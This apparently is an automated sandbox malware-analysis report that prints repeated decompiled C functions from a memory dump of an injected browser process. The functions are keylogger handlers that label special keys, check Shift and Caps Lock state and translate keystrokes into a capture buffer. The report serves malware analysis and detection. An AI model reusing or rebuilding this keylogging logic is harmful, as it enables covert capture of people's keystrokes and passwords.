Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Volume Down], xrefs: 00C85DCC
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85A38, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A38(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Accept]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

[Accept], xrefs: 00C85A3A
Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85C9C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C9C(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Arrow Left]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Arrow Left], xrefs: 00C85C9E
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85A05, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A05(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Numpad -]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Numpad -], xrefs: 00C85A07

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85A7C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A7C(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Arrow Down]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

[Arrow Down], xrefs: 00C85A7E
Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C8596C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8596C(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Copy]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Copy], xrefs: 00C8596E

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85D76, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D76(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Arrow Right]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

APIs

Part of subcall function 00C81BB4: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86
Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

